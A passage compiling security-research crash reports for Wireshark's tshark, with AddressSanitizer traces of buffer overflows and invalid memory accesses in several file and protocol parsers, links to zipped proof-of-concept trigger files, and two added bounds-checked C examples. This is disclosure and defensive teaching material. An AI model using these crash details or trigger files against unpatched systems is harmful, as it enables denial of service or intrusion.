0x0fff6ab4eb70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb80: 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb90: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7557==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11829. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38996.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=655
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3325==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff80063d1c at pc 0x0000004aaf56 bp 0x7fff80063a50 sp 0x7fff80063200
WRITE of size 202 at 0x7fff80063d1c thread T0
#0 0x4aaf55 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x7fb265728fad in file_read wireshark/wiretap/file_wrappers.c:1222:13
#2 0x7fb2658ae866 in wtap_read_bytes_or_eof wireshark/wiretap/wtap.c:1363:15
#3 0x7fb265783fac in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:178:14
#4 0x7fb265782bfa in mp2t_bits_per_second wireshark/wiretap/mp2t.c:236:10
#5 0x7fb2657823a0 in mp2t_open wireshark/wiretap/mp2t.c:363:14
#6 0x7fb265716911 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#7 0x51bd1d in cf_open wireshark/tshark.c:4195:9
#8 0x51584e in main wireshark/tshark.c:2188:9
Address 0x7fff80063d1c is located in stack of thread T0 at offset 220 in frame
#0 0x7fb265783cdf in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:170
This frame has 1 object(s):
[32, 220) 'buffer' <== Memory access at offset 220 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100070004750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004780: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100070004790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000700047a0: 00 00 00[04]f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
0x1000700047b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047e0: f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 02 f2 02 f2
0x1000700047f0: 04 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3325==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11820. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38997.zip
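The mp2t report above shows a 202-byte write landing at the end of the 188-byte stack object 'buffer' in mp2t_find_next_pcr, i.e. a read of file data into a fixed-size scratch buffer whose length was not bounded by that buffer. The following is an added illustration, not Wireshark's code and not part of the original report, of the shape a PCR scanner takes when the packet size it works with comes from the file being parsed: the size is checked against the scratch buffer before any copy, and the adaptation-field length is checked against the packet before the PCR bytes are read. The packet layout and PCR encoding follow the MPEG-2 transport stream format; the stream contents, the TS_MAX_PKT limit, the return codes and all function names are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TS_SYNC_BYTE 0x47
#define TS_MAX_PKT   204   /* assumed upper bound: 188-byte packet plus a 16-byte FEC trailer */

enum { PCR_FOUND = 0, PCR_NONE = 1, PCR_BAD_PKT_SIZE = 2 };

/* Decode program_clock_reference: 33-bit base, 6 reserved bits, 9-bit extension (27 MHz units). */
static uint64_t decode_pcr(const uint8_t *p)
{
    uint64_t base = ((uint64_t)p[0] << 25) | ((uint64_t)p[1] << 17) |
                    ((uint64_t)p[2] << 9)  | ((uint64_t)p[3] << 1)  | (p[4] >> 7);
    uint32_t ext  = ((uint32_t)(p[4] & 0x01) << 8) | p[5];
    return base * 300 + ext;
}

/*
 * Walk fixed-size packets of an in-memory stream and return the first PCR found.
 * pkt_size is untrusted (it is derived from the file), so it is validated against
 * the scratch buffer before a single byte is copied into it.
 */
static int find_next_pcr(const uint8_t *stream, size_t stream_len, size_t pkt_size,
                         size_t *pkt_index, uint64_t *pcr)
{
    uint8_t buffer[TS_MAX_PKT];                   /* fixed-size stack scratch buffer */

    if (pkt_size < 188 || pkt_size > sizeof buffer)
        return PCR_BAD_PKT_SIZE;                  /* the check an unbounded read lacks */

    for (size_t off = 0, idx = 0; off + pkt_size <= stream_len; off += pkt_size, idx++) {
        memcpy(buffer, stream + off, pkt_size);   /* in bounds by the check above */
        if (buffer[0] != TS_SYNC_BYTE)
            continue;
        if (!(buffer[3] & 0x20))                  /* adaptation_field_control: no AF */
            continue;
        uint8_t af_len = buffer[4];
        if (af_len < 7 || 5 + (size_t)af_len > 188)   /* flags byte + 6 PCR bytes must fit */
            continue;
        if (buffer[5] & 0x10) {                   /* PCR_flag */
            *pkt_index = idx;
            *pcr = decode_pcr(&buffer[6]);
            return PCR_FOUND;
        }
    }
    return PCR_NONE;                              /* a trailing partial packet is simply ignored */
}

/* Constructed sample stream: two 188-byte packets, the second carrying PCR base 1000000, ext 5. */
static size_t build_sample_stream(uint8_t *out, size_t cap)
{
    const size_t n = 2 * 188;
    if (cap < n) return 0;
    memset(out, 0xFF, n);
    out[0] = TS_SYNC_BYTE; out[1] = 0x00; out[2] = 0x11; out[3] = 0x10;   /* PID 0x11, payload only */
    uint8_t *p = out + 188;
    p[0] = TS_SYNC_BYTE; p[1] = 0x01; p[2] = 0x00; p[3] = 0x30;           /* PID 0x100, AF + payload */
    p[4] = 7;                         /* adaptation_field_length */
    p[5] = 0x10;                      /* PCR_flag set */
    uint64_t base = 1000000, ext = 5; /* PCR = base * 300 + ext = 300000005 */
    p[6]  = (uint8_t)(base >> 25);
    p[7]  = (uint8_t)(base >> 17);
    p[8]  = (uint8_t)(base >> 9);
    p[9]  = (uint8_t)(base >> 1);
    p[10] = (uint8_t)(((base & 1) << 7) | 0x7E | (ext >> 8));
    p[11] = (uint8_t)(ext & 0xFF);
    return n;
}

/* Scan the sample with the real packet size. */
static int demo_find_pcr(uint64_t *pcr_out, size_t *idx_out)
{
    uint8_t stream[2 * 188];
    size_t len = build_sample_stream(stream, sizeof stream);
    return find_next_pcr(stream, len, 188, idx_out, pcr_out);
}

/* Scan the same sample with a packet size a hostile file header might claim. */
static int demo_oversized_packet(void)
{
    uint8_t stream[2 * 188];
    size_t len = build_sample_stream(stream, sizeof stream);
    size_t idx; uint64_t pcr;
    return find_next_pcr(stream, len, 4096, &idx, &pcr);
}

int main(void)
{
    uint64_t pcr = 0; size_t idx = 0;
    printf("status=%d idx=%zu pcr=%llu\n", demo_find_pcr(&pcr, &idx), idx, (unsigned long long)pcr);
    printf("oversized status=%d\n", demo_oversized_packet());
    return 0;
}
```

Building this with "-fsanitize=address" and then deleting the pkt_size check is a quick way to watch ASan report the same kind of stack-buffer-overflow as the trace above.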
Source: https://code.google.com/p/google-security-research/issues/detail?id=653
The following SIGSEGV crash due to an invalid memory write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31799==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000fff3 (pc 0x7f538efe2e98 bp 0x7ffff1414290 sp 0x7ffff1413a18 T0)
#0 0x7f538efe2e97 /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
#1 0x4aaeac in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#2 0x7f53989ebdee in get_value wireshark/epan/dissectors/packet-btatt.c:6021:9
#3 0x7f53989cd2a1 in dissect_btatt wireshark/epan/dissectors/packet-btatt.c:6434:40
#4 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#6 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#7 0x7f5398abde89 in dissect_btl2cap wireshark/epan/dissectors/packet-btl2cap.c:2217:26
#8 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#9 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#10 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#11 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#12 0x7f5398add99f in dissect_btle wireshark/epan/dissectors/packet-btle.c:760:21
#13 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#15 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#16 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#17 0x7f5398ae089b in dissect_btle_rf wireshark/epan/dissectors/packet-btle_rf.c:221:27
#18 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#20 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0x7f53989467c5 in dissect_bluetooth wireshark/epan/dissectors/packet-bluetooth.c:1748:10
#22 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f539911d5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f539840933b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f53983b73c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
==31799==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11817. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38998.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=652
The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31034==ERROR: AddressSanitizer: SEGV on unknown address 0x7fc24e20fa84 (pc 0x7fbe445bb082 bp 0x7fff030fefb0 sp 0x7fff030fef00 T0)
#0 0x7fbe445bb081 in dissect_nbap_MACdPDU_Size wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79
#1 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#2 0x7fbe445c760d in dissect_nbap_HSDSCH_Initial_Capacity_AllocationItem wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1650:12
#3 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#4 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#5 0x7fbe445c7569 in dissect_nbap_HSDSCH_Initial_Capacity_Allocation wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1663:12
#6 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#7 0x7fbe445da43d in dissect_nbap_CommonMACFlow_Specific_InfoItem_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1682:12
#8 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#9 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#10 0x7fbe445da399 in dissect_nbap_CommonMACFlow_Specific_InfoList_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1695:12
#11 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#12 0x7fbe445da2bd in dissect_nbap_HSDSCH_Common_System_Information_ResponseFDD wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2120:12
#13 0x7fbe44546230 in dissect_HSDSCH_Common_System_Information_ResponseFDD_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2430:12
#14 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#16 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#17 0x7fbe4456f40e in dissect_ProtocolExtensionFieldExtensionValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:320:11
#18 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5
#19 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9
#20 0x7fbe4456f370 in dissect_nbap_T_extensionValue wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:200:12
#21 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#22 0x7fbe4456f12d in dissect_nbap_ProtocolExtensionField wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:215:12
#23 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#24 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#25 0x7fbe4456ef09 in dissect_nbap_ProtocolExtensionContainer wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:228:12
#26 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#27 0x7fbe445f23bf in dissect_nbap_CommonMeasurementInitiationRequest wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:263:12
#28 0x7fbe445644d0 in dissect_CommonMeasurementInitiationRequest_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:5030:12
#29 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#31 0x7fbe41b3802d in dissector_try_string wireshark/epan/packet.c:1443:9
#32 0x7fbe4456e3ce in dissect_InitiatingMessageValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:326:11
#33 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5
#34 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9
#35 0x7fbe4456df10 in dissect_nbap_InitiatingMessage_value wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:702:12
#36 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#37 0x7fbe4456d91d in dissect_nbap_InitiatingMessage wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:719:12
#38 0x7fbe433cc861 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1714:13
#39 0x7fbe4456d881 in dissect_nbap_NBAP_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:825:12
#40 0x7fbe4456d740 in dissect_NBAP_PDU_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:8430:12
#41 0x7fbe444e889b in dissect_nbap wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:457:9
#42 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#43 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#44 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#45 0x7fbe4378f98b in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#46 0x7fbe43786b88 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#47 0x7fbe4377fd99 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#48 0x7fbe4377cd03 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#49 0x7fbe4377acdf in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#50 0x7fbe43778cba in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#51 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#52 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#53 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#54 0x7fbe428455f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#55 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#56 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#57 0x7fbe41b402be in call_dissector_only wireshark/epan/packet.c:2662:8
#58 0x7fbe41b31ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#59 0x7fbe41b3133b in dissect_record wireshark/epan/packet.c:501:3
#60 0x7fbe41adf3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#61 0x5264eb in process_packet wireshark/tshark.c:3728:5
#62 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#63 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79 in dissect_nbap_MACdPDU_Size
==31034==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11815. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38999.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=649
The following crash due to a static buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8089==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000df60580 at pc 0x000000d6eb8c bp 0x7ffc622f4a80 sp 0x7ffc622f4a78
WRITE of size 1 at 0x00000df60580 thread T0
#0 0xd6eb8b in my_dgt_tbcd_unpack wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16
#1 0xd71258 in de_mid wireshark/epan/dissectors/packet-gsm_a_common.c:2270:9
#2 0x3c7ce02 in dissect_uma_IE wireshark/epan/dissectors/packet-uma.c:912:3
#3 0x3c7bfd1 in dissect_uma wireshark/epan/dissectors/packet-uma.c:1664:13
#4 0x1317640 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2740:13
#5 0x3c7b62b in dissect_uma_tcp wireshark/epan/dissectors/packet-uma.c:1699:2
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x1318ea7 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
#10 0x131ea52 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#11 0x1319ad8 in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#12 0x132fb70 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#13 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#15 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#16 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#17 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#22 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#23 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#24 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#25 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#26 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#27 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#28 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#32 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#36 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#37 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#38 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#39 0x53c91b in process_packet wireshark/tshark.c:3728:5
#40 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#41 0x52c1df in main wireshark/tshark.c:2197:13
0x00000df60580 is located 0 bytes to the right of global variable 'a_bigbuf' defined in 'packet-gsm_a_common.c:762:13' (0xdf60180) of size 1024
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16 in my_dgt_tbcd_unpack
Shadow bytes around the buggy address:
0x000081be4060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x000081be40b0:[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40e0: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000081be40f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8089==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11797. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39000.zip
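The gsm_a_common report above is a one-byte write exactly at the end of the 1024-byte global 'a_bigbuf' from my_dgt_tbcd_unpack, i.e. a digit unpacker producing more output than its fixed buffer holds. As an added example, not Wireshark's code and not taken from the report, here is a TBCD unpacker that takes the output capacity as a parameter and fails cleanly when the digits do not fit. The digit alphabet is the TBCD one from 3GPP TS 29.002 (low nibble first, 0xF as filler); the buffer name, the sample inputs and the function names are constructed for this illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Fixed-size decode buffer, sized like the 1024-byte global named in the report (assumed role). */
#define BIGBUF_SIZE 1024
static char bigbuf[BIGBUF_SIZE];

/* TBCD digit alphabet: 0-9, then '*', '#', 'a', 'b', 'c'; nibble 0xF is filler, not a digit. */
static char tbcd_digit(uint8_t nibble)
{
    static const char alphabet[] = "0123456789*#abc";
    return nibble < 15 ? alphabet[nibble] : '\0';
}

/*
 * Unpack TBCD octets into a NUL-terminated string. Returns the number of digits
 * written, or -1 if they would not fit in out_size bytes (out is still terminated).
 * Because the capacity is a parameter, every write is bounded by the caller's buffer,
 * whether that buffer is a global, a stack array or heap memory.
 */
static int tbcd_unpack(const uint8_t *in, size_t in_len, char *out, size_t out_size)
{
    size_t n = 0;
    if (out_size == 0) return -1;
    for (size_t i = 0; i < in_len; i++) {
        uint8_t nibbles[2] = { (uint8_t)(in[i] & 0x0F), (uint8_t)(in[i] >> 4) };  /* low nibble first */
        for (int k = 0; k < 2; k++) {
            char c = tbcd_digit(nibbles[k]);
            if (c == '\0') {              /* filler: the number ends here */
                out[n] = '\0';
                return (int)n;
            }
            if (n + 1 >= out_size) {      /* no room for this digit plus the terminator */
                out[n] = '\0';
                return -1;
            }
            out[n++] = c;
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Constructed input "12345" in TBCD: 0x21 0x43 0xF5 (odd digit count, filler in the last high nibble). */
static int demo_short_number(char *out, size_t out_size)
{
    const uint8_t tbcd[] = { 0x21, 0x43, 0xF5 };
    return tbcd_unpack(tbcd, sizeof tbcd, out, out_size);
}

/* Constructed oversized input: 600 octets of 0x11 decode to 1200 digits, more than
 * bigbuf holds. Without the capacity check the 1025th write would land past the buffer,
 * which is the one-byte global-buffer-overflow pattern ASan reported above. */
static int demo_oversized_number(void)
{
    uint8_t tbcd[600];
    memset(tbcd, 0x11, sizeof tbcd);
    return tbcd_unpack(tbcd, sizeof tbcd, bigbuf, sizeof bigbuf);
}
```

A caller that gets -1 back should treat the field as malformed and stop decoding it rather than fall through to whatever partial string is in the buffer.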
Source: https://code.google.com/p/google-security-research/issues/detail?id=646
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==5629==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000044bf7e6 at pc 0x0000009eb451 bp 0x7ffcd2fd6050 sp 0x7ffcd2fd6048
READ of size 1 at 0x0000044bf7e6 thread T0
#0 0x9eb450 in ascend_seek wireshark/wiretap/ascendtext.c:105:19
#1 0x9ea5e0 in ascend_open wireshark/wiretap/ascendtext.c:167:12
#2 0x83f7c6 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
0x0000044bf7e6 is located 58 bytes to the left of global variable '<string literal>' defined in 'ascendtext.c:61:25' (0x44bf820) of size 10
'<string literal>' is ascii string 'PRI-XMIT-'
0x0000044bf7e6 is located 0 bytes to the right of global variable '<string literal>' defined in 'ascendtext.c:117:30' (0x44bf7e0) of size 6
'<string literal>' is ascii string 'Date:'
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/wiretap/ascendtext.c:105:19 in ascend_seek
